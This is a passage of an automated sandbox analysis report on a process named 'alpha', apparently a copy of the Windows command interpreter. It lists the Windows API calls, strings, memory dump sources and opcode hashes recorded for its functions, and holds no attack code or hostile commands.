                              • API ID: memset$_wcslwr
                              • String ID: [%s]
                              APIs
                                • Part of subcall function 00007FF744F133A8: iswspace.MSVCRT(?,?,00000000,00007FF744F2D6EE,?,?,?,00007FF744F20632), ref: 00007FF744F133C0
                              • iswspace.MSVCRT(?,?,?,00007FF744F132A4), ref: 00007FF744F1331C
                              Strings
                              Similarity
                              • API ID: iswspace
                              • String ID: off
                              APIs
                              Strings
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: %s=%s$DPATH$PATH
                              APIs
                              Strings
                              Similarity
                              • API ID: wcscmp
                              • String ID: *.*$????????.???
                              APIs
                              Strings
                              Similarity
                              • API ID: fprintf
                              • String ID: CMD Internal Error %s$%s$Null environment
                              APIs
                              Strings
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                              APIs
                              Strings
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: RaiseFailFastException$kernelbase.dll
                              APIs
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              APIs
                              Similarity
                              • API ID: _wcsnicmp$wcschr
                              • String ID:
                              APIs
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF744F092AC), ref: 00007FF744F130CA
                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F130DD
                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F130F6
                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F13106
                              Similarity
                              • API ID: ErrorMode$FullNamePathwcschr
                              • String ID:
                              APIs
                              Similarity
                              • API ID: memset$DriveFullNamePathType
                              • String ID:
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                              • Instruction ID: 80a66cdb842b82662a66d7eeeff624c70d0e31042845629544cf515331e0d7b4
                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                              • Instruction Fuzzy Hash: DB419265A0DB45C6EB50BF1AF890365A364FB88744F984035DD8D827A8DF3DE854D720
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcstol$lstrcmp
                              • String ID:
                              • API String ID: 3515581199-0
                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                              • Instruction ID: 5b96df08cdd1bf8d64eb1facd2017f72ac0cdd6bdd026f3b8f00b67ef22036a1
                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                              • Instruction Fuzzy Hash: 9E217832A0DA42C3E7657F6A95D413AEBB0FB49790FC95134DF4F026D8CE6CE845A610
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$TimeWrite
                              • String ID:
                              • API String ID: 4019809305-0
                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                              • Instruction ID: 079db09c7829ba1843ba1df1cc296073fa627ce354bee1fbf4f3275e350bc4cc
                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                              • Instruction Fuzzy Hash: 24318121A0C652C7E760BF56A4C4238E6A0FB49B50F895638DE0D43BD9CF3DD854A610
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveNamePathTypeVolume
                              • String ID:
                              • API String ID: 1029679093-0
                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                              • Instruction ID: 093ba220da545bbf06386b6a3a49d482a74f8449ed659bddedbdd9b385686cec
                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                              • Instruction Fuzzy Hash: 2D313032709A81CAEB20AF22D9943E9B7A4F749B89F884135CE4D47788DF3CD545D710
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                              • String ID:
                              • API String ID: 2448200120-0
                              • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                              • Instruction ID: 93e70b0856db6d96be0f521e59aed0d5d3f415caa003a1cde70e91c7faebb832
                              • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                              • Instruction Fuzzy Hash: AB210A31A1C646CBF714BF12A480579F7A1FB85B81F984135ED89077D9CE3DE441EA20
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                              • Instruction ID: 6b3d2f3cdc0e890ae94fae5fa073844f7165552f4aa278ce87c526f98793c942
                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                              • Instruction Fuzzy Hash: 2121716160CA45C6EB04BF53A58007AF7A1EB89BD0B899134CE1E037D9DE3CE4019620
                              APIs
                                • Part of subcall function 00007FF744F13C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F13D0C
                                • Part of subcall function 00007FF744F13C24: towupper.MSVCRT ref: 00007FF744F13D2F
                                • Part of subcall function 00007FF744F13C24: iswalpha.MSVCRT ref: 00007FF744F13D4F
                                • Part of subcall function 00007FF744F13C24: towupper.MSVCRT ref: 00007FF744F13D75
                                • Part of subcall function 00007FF744F13C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F13DBF
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F06ABF
                              • RtlFreeHeap.NTDLL ref: 00007FF744F06AD3
                                • Part of subcall function 00007FF744F06B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF744F06AE8,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B8B
                                • Part of subcall function 00007FF744F06B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF744F06AE8,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B97
                                • Part of subcall function 00007FF744F06B84: RtlFreeHeap.NTDLL ref: 00007FF744F06BAF
                                • Part of subcall function 00007FF744F06B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F06AF1,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B39
                                • Part of subcall function 00007FF744F06B30: RtlFreeHeap.NTDLL ref: 00007FF744F06B4D
                                • Part of subcall function 00007FF744F06B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F06AF1,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B59
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F06B03
                              • RtlFreeHeap.NTDLL ref: 00007FF744F06B17
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                              • String ID:
                              • API String ID: 3512109576-0
                              • Opcode ID: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                              • Instruction ID: 255085466155c8e1eb204e1662d004e05aa02b9da932a27b3d5bbf333e664a4e
                              • Opcode Fuzzy Hash: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                              • Instruction Fuzzy Hash: 3C21606190DA82C6FB04FF6694942B8BBA0EB59B44F9C4035CE4E57399DE3CA445E370
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6D0
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6E7
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B701
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B715
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocSize
                              • String ID:
                              • API String ID: 2549470565-0
                              • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                              • Instruction ID: a0039b3f844da02ea21d110a4223fd014ecda3acfcc89b42d01985dbd3b2f43f
                              • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                              • Instruction Fuzzy Hash: 68210035A1D682C6EB14BF56E584078E6A1FB89B80BCC9431DE4E037D8DF3CE845A720
                              APIs
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D01C
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D033
                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D06D
                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D07F
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                              • String ID:
                              • API String ID: 1033415088-0
                              • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                              • Instruction ID: b4c57ada0ce31d2c648cd73465e5423e3ab01b5589bb649765affbf930e643a0
                              • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                              • Instruction Fuzzy Hash: 3911513261CA42C7D744AB12F49417AF7A0FB8AB95F845125EE8E47BD8DF3CD0459B10
                              APIs
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05A2E
                              • _open_osfhandle.MSVCRT ref: 00007FF744F05A4F
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F237AA
                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F237D2
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                              • String ID:
                              • API String ID: 22757656-0
                              • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                              • Instruction ID: 2a3f475f99d42162fd99df2ee7e47390c9242faa73e4b6e5540696890243e9d4
                              • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                              • Instruction Fuzzy Hash: 7F116371A1C645C7E750BF25E488339BAA0F789B65F984734DA29073D4CF3CD4459B10
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256C5
                              • RtlFreeHeap.NTDLL ref: 00007FF744F256D9
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256FD
                              • RtlFreeHeap.NTDLL ref: 00007FF744F25711
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              • API String ID: 3859560861-0
                              • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                              • Instruction ID: 5c301ef1b82d7876ed0f3de2d9e79e51c8f448fa5e753a7230d3f8e30c32a0cb
                              • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                              • Instruction Fuzzy Hash: CD112872A08B81C7DB00AF56E4440A8BBA0F749F84B8C8125DF4E03758DF38E456C750
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                              • Instruction ID: 2ed8f7bbb37a25f7f48e55c1dfb1ce8d1e8a61015825f1e474352e434e02242b
                              • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                              • Instruction Fuzzy Hash: D1219F3591DB45C6E740BF06E884369B3A4FB88754F980035DE8D827A8DF7DE498D720
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F1EE64
                              • RtlFreeHeap.NTDLL ref: 00007FF744F1EE78
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                              • String ID:
                              • API String ID: 2759988882-0
                              • Opcode ID: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                              • Instruction ID: a7cd730335a9e1d8cd85dc8112b3214e626cc75a11854ab703b50a76f498d01b
                              • Opcode Fuzzy Hash: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                              • Instruction Fuzzy Hash: F4F0EC61A1DA42C7EB14BF679495178E9E1EF8EB41B8D9434CD4E42398EE3CA8449720
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID:
                              • API String ID: 1606018815-0
                              • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction ID: c5d180bd216bad9aeaa30a082b070fd1a3834689181c2c8ec9a601c070538841
                              • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction Fuzzy Hash: DDF0A235529A42CBD744BF11E484179FA60FB8AB42F889274DE4B063D8DF3CD5159B50
                              APIs
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                                • Part of subcall function 00007FF744F0EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F000
                                • Part of subcall function 00007FF744F0EF40: wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F031
                                • Part of subcall function 00007FF744F0EF40: iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              • longjmp.MSVCRT ref: 00007FF744F1CCBC
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1CCE0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
